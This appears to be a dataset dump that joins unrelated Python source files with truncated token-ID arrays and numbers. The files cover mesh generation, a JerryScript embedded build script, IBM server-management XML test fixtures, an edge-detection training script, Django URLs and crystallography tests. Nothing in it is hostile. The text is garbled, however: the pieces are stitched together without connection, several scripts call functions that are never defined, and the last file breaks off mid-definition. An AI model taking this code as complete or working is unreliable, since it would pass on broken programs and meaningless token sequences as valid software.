"""Subdivided icosahedral mesh generation""" from __future__ import print_function import numpy as np # following: http://blog.andreaskahler.com/2009/06/creating-icosphere-mesh-in-code.html # hierarchy: # Icosphere -> Triangle -> Point def calculate_npts(level): n = 2**level return 2 + 10 * n**2 def calculate_nfaces(level): n = 2**level return 20 * n**2 def cart2geo(x, y, z): """convert x y z cartesian coordinates to latitude longitude radius xyz is a numpy array, a right handed co-ordinate system is assumed with -- x-axis going through the equator at 0 degrees longitude -- y-axis going through the equator at 90 degrees longitude -- z-axis going through the north pole.""" r = np.sqrt(x**2 + y**2 + z**2) lon = np.rad2deg(np.arctan2(y,x)) lat = np.rad2deg(np.arcsin(z/r)) return lat, lon, r def geo2cart(lat, lon, r): """convert latitude longitude radius to x y z cartesian coordinates xyz is a numpy array, a right handed co-ordinate system is assumed with -- x-axis going through the equator at 0 degrees longitude -- y-axis going through the equator at 90 degrees longitude -- z-axis going through the north pole.""" x = r * np.cos(lon) * np.cos(lat) y = r * np.sin(lon) * np.cos(lat) z = r * np.sin(lat) return x, y, z # def xyzToLatLonR(xyz): # trans = np.array([np.])
[ 37811, 7004, 7146, 1384, 14158, 8546, 21962, 19609, 5270, 37811, 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 299, 32152, 355, 45941, 198, 198, 2, 1708, 25, 2638, 1378, 14036, 13, 49078, 2093, 993, 1754, 13, 785, 14, ...
2.429519
603
# Resolve the problem!! import string import random SYMBOLS = list('!"#$%&\'()*+,-./:;?@[]^_`{|}~') if __name__ == '__main__': run()
[ 2, 1874, 6442, 262, 1917, 3228, 198, 11748, 4731, 198, 11748, 4738, 198, 198, 23060, 10744, 3535, 50, 796, 1351, 10786, 2474, 29953, 4, 5, 43054, 3419, 9, 10, 12095, 19571, 25, 26, 30, 31, 21737, 61, 62, 63, 90, 91, 92, 93, 11537,...
2.21875
64
#!/usr/bin/env python # Copyright JS Foundation and other contributors, http://js.foundation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import fnmatch import os def build_soft_links(project_path, jerry_path): """ Creates soft links into the @project_path. """ if not os.path.exists(project_path): os.makedirs(project_path) links = [ { # arc 'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'arc'), 'link_name': 'arc' }, { # include 'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'include'), 'link_name': 'include' }, { # quark 'src': os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'jerry_app', 'quark'), 'link_name': 'quark' }, { # quark/jerryscript 'src': jerry_path, 'link_name': os.path.join('quark', 'jerryscript') } ] for link in links: src = os.path.join(jerry_path, link['src']) link_name = os.path.join(project_path, link['link_name']) if not os.path.islink(link_name): os.symlink(src, link_name) print("Created symlink '{link_name}' -> '{src}'".format(src=src, link_name=link_name)) def find_sources(root_dir, sub_dir): """ Find .c and .S files inside the @root_dir/@sub_dir directory. Note: the returned paths will be relative to the @root_dir directory. """ src_dir = os.path.join(root_dir, sub_dir) matches = [] for root, dirnames, filenames in os.walk(src_dir): for filename in fnmatch.filter(filenames, '*.[c|S]'): file_path = os.path.join(root, filename) relative_path = os.path.relpath(file_path, root_dir) matches.append(relative_path) return matches def build_jerry_data(jerry_path): """ Build up a dictionary which contains the following items: - sources: list of JerryScript sources which should be built. - dirs: list of JerryScript dirs used. - cflags: CFLAGS for the build. """ jerry_sources = [] jerry_dirs = set() for sub_dir in ['jerry-core', 'jerry-math', os.path.join('targets', 'baremetal-sdk', 'curie-bsp', 'source')]: for file in find_sources(os.path.normpath(jerry_path), sub_dir): path = os.path.join('jerryscript', file) jerry_sources.append(path) jerry_dirs.add(os.path.split(path)[0]) jerry_cflags = [ '-DJERRY_GLOBAL_HEAP_SIZE=10', '-DJERRY_NDEBUG', '-DJERRY_DISABLE_HEAVY_DEBUG', '-DJERRY_BUILTIN_NUMBER=0', '-DJERRY_BUILTIN_STRING=0', '-DJERRY_BUILTIN_BOOLEAN=0', #'-DJERRY_BUILTIN_ERRORS=0', '-DJERRY_BUILTIN_ARRAY=0', '-DJERRY_BUILTIN_MATH=0', '-DJERRY_BUILTIN_JSON=0', '-DJERRY_BUILTIN_DATE=0', '-DJERRY_BUILTIN_REGEXP=0', '-DJERRY_BUILTIN_ANNEXB=0', '-DJERRY_ESNEXT=0', '-DJERRY_LCACHE=0', '-DJERRY_PROPERTY_HASHMAP=0', ] return { 'sources': jerry_sources, 'dirs': jerry_dirs, 'cflags': jerry_cflags, } def write_file(path, content): """ Writes @content into the file at specified by the @path. """ norm_path = os.path.normpath(path) with open(norm_path, "w+") as f: f.write(content) print("Wrote file '{0}'".format(norm_path)) def build_obj_y(source_list): """ Build obj-y additions from the @source_list. Note: the input sources should have their file extensions. """ return '\n'.join(['obj-y += {0}.o'.format(os.path.splitext(fname)[0]) for fname in source_list]) def build_cflags_y(cflags_list): """ Build cflags-y additions from the @cflags_list. Note: the input sources should have their file extensions. """ return '\n'.join(['cflags-y += {0}'.format(cflag) for cflag in cflags_list]) def build_mkdir(dir_list): """ Build mkdir calls for each dir in the @dir_list. """ return '\n'.join(['\t$(AT)mkdir -p {0}'.format(os.path.join('$(OUT_SRC)', path)) for path in dir_list]) def create_root_kbuild(project_path): """ Creates @project_path/Kbuild.mk file. """ root_kbuild_path = os.path.join(project_path, 'Kbuild.mk') root_kbuild_content = ''' obj-$(CONFIG_QUARK_SE_ARC) += arc/ obj-$(CONFIG_QUARK_SE_QUARK) += quark/ ''' write_file(root_kbuild_path, root_kbuild_content) def create_root_makefile(project_path): """ Creates @project_path/Makefile file. """ root_makefile_path = os.path.join(project_path, 'Makefile') root_makefile_content = ''' THIS_DIR := $(shell dirname $(abspath $(lastword $(MAKEFILE_LIST)))) T := $(abspath $(THIS_DIR)/../..) PROJECT := {project_name} BOARD := curie_101 ifeq ($(filter curie_101, $(BOARD)),) $(error The curie jerry sample application can only run on the curie_101 Board) endif BUILDVARIANT ?= debug quark_DEFCONFIG = $(PROJECT_PATH)/quark/defconfig arc_DEFCONFIG = $(PROJECT_PATH)/arc/defconfig # Optional: set the default version VERSION_MAJOR := 1 VERSION_MINOR := 0 VERSION_PATCH := 0 include $(T)/build/project.mk '''.format(project_name=project_name) write_file(root_makefile_path, root_makefile_content) def create_arc_kbuild(project_path): """ Creates @project_path/arc/Kbuild.mk file. """ arc_path = os.path.join(project_path, 'arc') arc_kbuild_path = os.path.join(arc_path, 'Kbuild.mk') arc_sources = find_sources(arc_path, '.') arc_kbuild_content = build_obj_y(arc_sources) write_file(arc_kbuild_path, arc_kbuild_content) def create_quark_kbuild(project_path, jerry_path): """ Creates @project_path/quark/Kbuild.mk file. """ quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk') # Extract a few JerryScript related data jerry_data = build_jerry_data(jerry_path) jerry_objects = build_obj_y(jerry_data['sources']) jerry_defines = jerry_data['cflags'] jerry_build_dirs = build_mkdir(jerry_data['dirs']) quark_include_paths = [ 'include', 'jerryscript', os.path.join('jerryscript', 'jerry-math', 'include'), os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include') ] + list(jerry_data['dirs']) quark_includes = [ '-Wno-error', ] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths] quark_cflags = build_cflags_y(jerry_defines + quark_includes) quark_kbuild_content = ''' {cflags} obj-y += main.o {objects} build_dirs: {dirs} $(OUT_SRC): build_dirs '''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs) write_file(quark_kbuild_path, quark_kbuild_content) if __name__ == '__main__': import sys if len(sys.argv) != 2: print('Usage:') print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0])) sys.exit(1) project_name = 'curie_bsp_jerry' file_dir = os.path.dirname(os.path.abspath(__file__)) jerry_path = os.path.join(file_dir, "..", "..", "..") curie_path = os.path.join(os.getcwd(), sys.argv[1]) main(curie_path, project_name, jerry_path)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 2, 15069, 26755, 5693, 290, 584, 20420, 11, 2638, 1378, 8457, 13, 42526, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198...
2.277516
3,398
from math import sqrt import emoji num = int(input("Digite um nmero: ")) raiz = sqrt(num) print("A raiz do nmero {0} {1:.2f}.".format(num, raiz)) print(emoji.emojize("Hello World! :earth_americas:", use_aliases=True))
[ 6738, 10688, 1330, 19862, 17034, 198, 11748, 44805, 198, 22510, 796, 493, 7, 15414, 7203, 19511, 578, 23781, 299, 647, 78, 25, 366, 4008, 198, 430, 528, 796, 19862, 17034, 7, 22510, 8, 198, 4798, 7203, 32, 2179, 528, 466, 299, 647, ...
2.406593
91
macs_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetHostMacAddressesResponse</wsa:Action><wsa:RelatesTo>dt:1348742659504</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:111efb9a-f7d8-4977-8472-bcad40212a71</wsa:MessageID></s:Header><s:Body><GetHostMacAddressesResponse><HostMACaddress><HostMaddr><Description>Host Ethernet MAC Address 1</Description><Address>6E:F3:DD:E5:96:40</Address></HostMaddr><HostMaddr><Description>Host Ethernet MAC Address 2</Description><Address>6E:F3:DD:E5:96:42</Address></HostMaddr></HostMACaddress></GetHostMacAddressesResponse></s:Body></s:Envelope> ''' memory_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetMemoryInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348742659500</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:dc560696-2ba4-4917-b7e7-1aac1983b727</wsa:MessageID></s:Header><s:Body><GetMemoryInfoResponse><Memory><MemoryInfo><Description>DIMM 2</Description><PartNumber>HMT351R7BFR4A-H9</PartNumber><SerialNumber>33b8a62f</SerialNumber><ManufactureDate>4511</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 3</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>b38aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 6</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>a78aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 9</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>b524042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 11</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>ba24042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo><MemoryInfo><Description>DIMM 12</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>8e8aa385</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 15</Description><PartNumber>M393B1K70CH0-YH9</PartNumber><SerialNumber>7feda482</SerialNumber><ManufactureDate>2211</ManufactureDate><Type>DDR3</Type><Size>8</Size></MemoryInfo><MemoryInfo><Description>DIMM 18</Description><PartNumber>EBJ40RF4ECFA-DJ-F</PartNumber><SerialNumber>d924042b</SerialNumber><ManufactureDate>4711</ManufactureDate><Type>DDR3</Type><Size>4</Size></MemoryInfo></Memory></GetMemoryInfoResponse></s:Body></s:Envelope> ''' generic_data_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetVitalProductDataResponse</wsa:Action><wsa:RelatesTo>dt:1348742659499</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:e6829941-2510-4b3d-b9f3-61c7be372dfd</wsa:MessageID></s:Header><s:Body><GetVitalProductDataResponse><GetVitalProductDataResponse><MachineLevelVPD><ProductName>System x3550 M3</ProductName><MachineTypeAndModel>794452G</MachineTypeAndModel><SerialNumber>KD55ARA</SerialNumber><UUID>99A4E4A303023961B8E1561E33328996</UUID></MachineLevelVPD><ComponentLevelVPD><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentLevelVPD><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID></ComponentLevelVPD><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 1</FRUName><SerialNumber>K1411183222</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>59Y3915</FRUNumber><FRUName>DASD Backplane 1</FRUName><SerialNumber>Y010RW1AR1Y0</SerialNumber><MfgID>USIS</MfgID><Action>Added</Action><TimeStamp>11/25/2011:13:53:13</TimeStamp></ComponentActivityLog><ComponentActivityLog><FRUNumber>39Y7229</FRUNumber><FRUName>Power Supply 2</FRUName><SerialNumber>K141115Y2BK</SerialNumber><MfgID>ACBE</MfgID><Action>Added</Action><TimeStamp>01/27/2012:10:28:39</TimeStamp></ComponentActivityLog><VPD><FirmwareName>IMM</FirmwareName><VersionString>YUOOC7E</VersionString><ReleaseDate>09/30/2011</ReleaseDate></VPD><VPD><FirmwareName>UEFI</FirmwareName><VersionString>D6E154A</VersionString><ReleaseDate>09/23/2011</ReleaseDate></VPD><VPD><FirmwareName>DSA</FirmwareName><VersionString>DSYT89P </VersionString><ReleaseDate>10/28/2011</ReleaseDate></VPD></GetVitalProductDataResponse></GetVitalProductDataResponse></s:Body></s:Envelope> ''' sn_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/iBMCControl/GetSPNameSettingsResponse</wsa:Action><wsa:RelatesTo>dt:1348742647137</wsa:RelatesTo><wsa:From><wsa:Address>http://10.10.10.10/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:d2ac4b59-9f60-456e-a182-6a077557e4c1</wsa:MessageID></s:Header><s:Body><GetSPNameSettingsResponse><SPName>SN# KD55ARA</SPName></GetSPNameSettingsResponse></s:Body></s:Envelope> ''' processors_response = '''<?xml version="1.0"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wxf="http://schemas.xmlsoap.org/ws/2004/09/transfer"><s:Header><wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To><wsa:Action>http://www.ibm.com/iBMC/sp/Monitors/GetProcessorInfoResponse</wsa:Action><wsa:RelatesTo>dt:1348757382511</wsa:RelatesTo><wsa:From><wsa:Address>http://rack-605-12-mgmt.dc2/wsman</wsa:Address></wsa:From><wsa:MessageID>uuid:9e5ec08d-0fac-449a-80fa-37cc78290a21</wsa:MessageID></s:Header><s:Body><GetProcessorInfoResponse><Processor><ProcessorInfo><Description>Processor 1</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo><ProcessorInfo><Description>Processor 2</Description><Speed>2666</Speed><Identifier>3030363735304141</Identifier><Type>Central</Type><Family>Intel Xeon</Family><Cores>8</Cores><Threads>1</Threads><Voltage>1.087000</Voltage><Datawidth>64</Datawidth></ProcessorInfo></Processor></GetProcessorInfoResponse></s:Body></s:Envelope> '''
[ 76, 16436, 62, 26209, 796, 705, 7061, 47934, 19875, 2196, 2625, 16, 13, 15, 13984, 6927, 82, 25, 4834, 1091, 68, 35555, 5907, 25, 82, 2625, 4023, 1378, 2503, 13, 86, 18, 13, 2398, 14, 16088, 14, 2713, 14, 568, 499, 12, 268, 1091, ...
2.55264
3,163
from __future__ import print_function import argparse import os import time, platform import cv2 import torch import torch.optim as optim from torch.utils.data import DataLoader from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info from losses import * from model import DexiNed # from model0C import DexiNed from utils import (image_normalization, save_image_batch_to_disk, visualize_result) IS_LINUX = True if platform.system()=="Linux" else False def parse_args(): """Parse command line arguments.""" parser = argparse.ArgumentParser(description='DexiNed trainer.') parser.add_argument('--choose_test_data', type=int, default=3, help='Already set the dataset for testing choice: 0 - 8') # ----------- test -------0-- TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8 test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX) test_dir = test_inf['data_dir'] is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5 # Training settings TRAIN_DATA = DATASET_NAMES[0] # BIPED=0 train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX) train_dir = train_inf['data_dir'] # Data parameters parser.add_argument('--input_dir', type=str, default=train_dir, help='the path to the directory with the input data.') parser.add_argument('--input_val_dir', type=str, default=test_inf['data_dir'], help='the path to the directory with the input data for validation.') parser.add_argument('--output_dir', type=str, default='checkpoints', help='the path to output the results.') parser.add_argument('--train_data', type=str, choices=DATASET_NAMES, default=TRAIN_DATA, help='Name of the dataset.') parser.add_argument('--test_data', type=str, choices=DATASET_NAMES, default=TEST_DATA, help='Name of the dataset.') parser.add_argument('--test_list', type=str, default=test_inf['test_list'], help='Dataset sample indices list.') parser.add_argument('--train_list', type=str, default=train_inf['train_list'], help='Dataset sample indices list.') parser.add_argument('--is_testing',type=bool, default=is_testing, help='Script in testing mode.') parser.add_argument('--double_img', type=bool, default=True, help='True: use same 2 imgs changing channels') # Just for test parser.add_argument('--resume', type=bool, default=False, help='use previous trained data') # Just for test parser.add_argument('--checkpoint_data', type=str, default='14/14_model.pth', help='Checkpoint path from which to restore model weights from.') parser.add_argument('--test_img_width', type=int, default=test_inf['img_width'], help='Image width for testing.') parser.add_argument('--test_img_height', type=int, default=test_inf['img_height'], help='Image height for testing.') parser.add_argument('--res_dir', type=str, default='result', help='Result directory') parser.add_argument('--log_interval_vis', type=int, default=50, help='The number of batches to wait before printing test predictions.') parser.add_argument('--epochs', type=int, default=22, metavar='N', help='Number of training epochs (default: 25).') parser.add_argument('--lr', default=1e-4, type=float, help='Initial learning rate.') parser.add_argument('--wd', type=float, default=1e-4, metavar='WD', help='weight decay (default: 1e-4)') # parser.add_argument('--lr_stepsize', # default=1e4, # type=int, # help='Learning rate step size.') parser.add_argument('--batch_size', type=int, default=8, metavar='B', help='the mini-batch size (default: 8)') parser.add_argument('--workers', default=8, type=int, help='The number of workers for the dataloaders.') parser.add_argument('--tensorboard',type=bool, default=True, help='Use Tensorboard for logging.'), parser.add_argument('--img_width', type=int, default=480, help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480 parser.add_argument('--img_height', type=int, default=480, help='Image height for training.') # BIPED 400 BSDS 352 parser.add_argument('--channel_swap', default=[2, 1, 0], type=int) parser.add_argument('--crop_img', default=True, type=bool, help='If true crop training images, else resize images to match image width and height.') parser.add_argument('--mean_pixel_values', default=[103.939,116.779,123.68, 137.86], type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892] args = parser.parse_args() return args def main(args): """Main function.""" print(f"Number of GPU's available: {torch.cuda.device_count()}") print(f"Pytorch version: {torch.__version__}") # Tensorboard summary writer tb_writer = None training_dir = os.path.join(args.output_dir,args.train_data) os.makedirs(training_dir,exist_ok=True) checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data) if args.tensorboard and not args.is_testing: # from tensorboardX import SummaryWriter # previous torch version from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather tb_writer = SummaryWriter(log_dir=training_dir) # Get computing device device = torch.device('cpu' if torch.cuda.device_count() == 0 else 'cuda') # Instantiate model and move it to the computing device model = DexiNed().to(device) # model = nn.DataParallel(model) ini_epoch =0 if not args.is_testing: if args.resume: ini_epoch=17 model.load_state_dict(torch.load(checkpoint_path, map_location=device)) dataset_train = BipedDataset(args.input_dir, img_width=args.img_width, img_height=args.img_height, mean_bgr=args.mean_pixel_values[0:3] if len( args.mean_pixel_values) == 4 else args.mean_pixel_values, train_mode='train', arg=args ) dataloader_train = DataLoader(dataset_train, batch_size=args.batch_size, shuffle=True, num_workers=args.workers) dataset_val = TestDataset(args.input_val_dir, test_data=args.test_data, img_width=args.test_img_width, img_height=args.test_img_height, mean_bgr=args.mean_pixel_values[0:3] if len( args.mean_pixel_values) == 4 else args.mean_pixel_values, test_list=args.test_list, arg=args ) dataloader_val = DataLoader(dataset_val, batch_size=1, shuffle=False, num_workers=args.workers) # Testing if args.is_testing: output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data) print(f"output_dir: {output_dir}") if args.double_img: # predict twice an image changing channels, then mix those results testPich(checkpoint_path, dataloader_val, model, device, output_dir, args) else: test(checkpoint_path, dataloader_val, model, device, output_dir, args) return criterion = bdcn_loss2 optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.wd) # lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize, # gamma=args.lr_gamma) # Main training loop seed=1021 for epoch in range(ini_epoch,args.epochs): if epoch%7==0: seed = seed+1000 np.random.seed(seed) torch.manual_seed(seed) torch.cuda.manual_seed(seed) print("------ Random seed applied-------------") # Create output directories output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch)) img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res') os.makedirs(output_dir_epoch,exist_ok=True) os.makedirs(img_test_dir,exist_ok=True) train_one_epoch(epoch, dataloader_train, model, criterion, optimizer, device, args.log_interval_vis, tb_writer, args=args) validate_one_epoch(epoch, dataloader_val, model, device, img_test_dir, arg=args) # Save model after end of every epoch torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(), os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch))) if __name__ == '__main__': args = parse_args() main(args)
[ 198, 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 198, 11748, 1822, 29572, 198, 11748, 28686, 198, 11748, 640, 11, 3859, 198, 198, 11748, 269, 85, 17, 198, 11748, 28034, 198, 11748, 28034, 13, 40085, 355, 6436, 198, 6738, 28034, ...
1.806565
6,276
#!/usr/bin/env python3 # coding=utf-8 # # Copyright (c) 2021 Huawei Device Co., Ltd. # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import sys import json import shutil from core.constants import JsTestConst from xdevice import platform_logger LOG = platform_logger("PretreatTargets") ############################################################################## ############################################################################## ############################################################################## ##############################################################################
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 2, 19617, 28, 40477, 12, 23, 198, 198, 2, 198, 2, 15069, 357, 66, 8, 33448, 43208, 16232, 1766, 1539, 12052, 13, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, ...
4.43254
252
from __future__ import absolute_import from django.conf.urls import patterns, url from django_comments.feeds import LatestCommentFeed from custom_comments import views feeds = { 'comments': LatestCommentFeed, } urlpatterns = patterns('', url(r'^post/$', views.custom_submit_comment), url(r'^flag/(\d+)/$', views.custom_flag_comment), url(r'^delete/(\d+)/$', views.custom_delete_comment), url(r'^approve/(\d+)/$', views.custom_approve_comment), url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'), ) urlpatterns += patterns('', (r'^rss/comments/$', LatestCommentFeed()), )
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 198, 6738, 42625, 14208, 13, 10414, 13, 6371, 82, 1330, 7572, 11, 19016, 198, 198, 6738, 42625, 14208, 62, 15944, 13, 12363, 82, 1330, 26603, 21357, 18332, 198, 198, 6738, 2183, 62, ...
2.659919
247
import pandas as pd, numpy as np from sklearn.preprocessing import OneHotEncoder author_int_dict = {'EAP':0,'HPL':1,'MWS':2} if __name__ == '__main__': pass
[ 11748, 19798, 292, 355, 279, 67, 11, 299, 32152, 355, 45941, 201, 198, 6738, 1341, 35720, 13, 3866, 36948, 1330, 1881, 21352, 27195, 12342, 201, 198, 201, 198, 9800, 62, 600, 62, 11600, 796, 1391, 6, 36, 2969, 10354, 15, 4032, 39, 6...
2.328767
73
# pylint: skip-file import sys import os # code to automatically download dataset curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__))) sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path import mxnet as mx import numpy as np import data from scipy.spatial.distance import cdist from sklearn.cluster import KMeans import model from autoencoder import AutoEncoderModel from solver import Solver, Monitor import logging if __name__ == '__main__': logging.basicConfig(level=logging.INFO) mnist_exp(mx.gpu(0))
[ 2, 279, 2645, 600, 25, 14267, 12, 7753, 198, 11748, 25064, 198, 11748, 28686, 198, 2, 2438, 284, 6338, 4321, 27039, 198, 22019, 81, 62, 6978, 796, 28686, 13, 6978, 13, 15908, 3672, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 418, 13,...
2.78392
199
from __future__ import division from cctbx.array_family import flex from cctbx import xray from cctbx import crystal from cctbx import maptbx from cctbx.maptbx import minimization from libtbx.test_utils import approx_equal import random from cctbx.development import random_structure from cctbx import sgtbx if (1): random.seed(0) flex.set_random_seed(0) def exercise_00(): """ Exercise maptbx.target_and_gradients_diffmap . """ xrs = get_xrs() map_data, f_calc = get_map(xrs=xrs) tg = maptbx.target_and_gradients_diffmap( unit_cell = xrs.unit_cell(), map_target = map_data, map_current = map_data, step = 0.3, sites_frac = xrs.sites_frac()) assert approx_equal(xrs.sites_cart(), [[0,0,0]]) assert approx_equal(tg.target(), 0) assert approx_equal(list(tg.gradients()), [[0,0,0]]) xrs = xrs.translate(x=0.3, y=-0.5, z=0.7) assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]]) map_current, f_calc = get_map(xrs=xrs) tg = maptbx.target_and_gradients_diffmap( unit_cell = xrs.unit_cell(), map_target = map_data, map_current = map_current, step = 0.3, sites_frac = xrs.sites_frac()) assert tg.target() > 0 for g in tg.gradients(): for g_ in g: assert abs(g_)>0. def exercise_01(d_min=1.0): """ Exercise maptbx.target_and_gradients_diffmap in action: minimization. """ xrs = get_xrs() map_target, f_calc = get_map(xrs=xrs) assert approx_equal(xrs.sites_cart(), [[0,0,0]]) for sx in [-1,0,1]: for sy in [-1,0,1]: for sz in [-1,0,1]: xrs_cp = xrs.deep_copy_scatterers() xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz) assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6) crystal_gridding = maptbx.crystal_gridding( unit_cell = xrs_cp.unit_cell(), space_group_info = xrs_cp.space_group_info(), pre_determined_n_real = map_target.accessor().all()) o = minimization.run( xray_structure = xrs_cp, miller_array = f_calc, crystal_gridding = crystal_gridding, map_target = map_target, step = d_min/4, target_type = "diffmap") assert approx_equal(xrs.sites_cart(), [[0,0,0]]) def 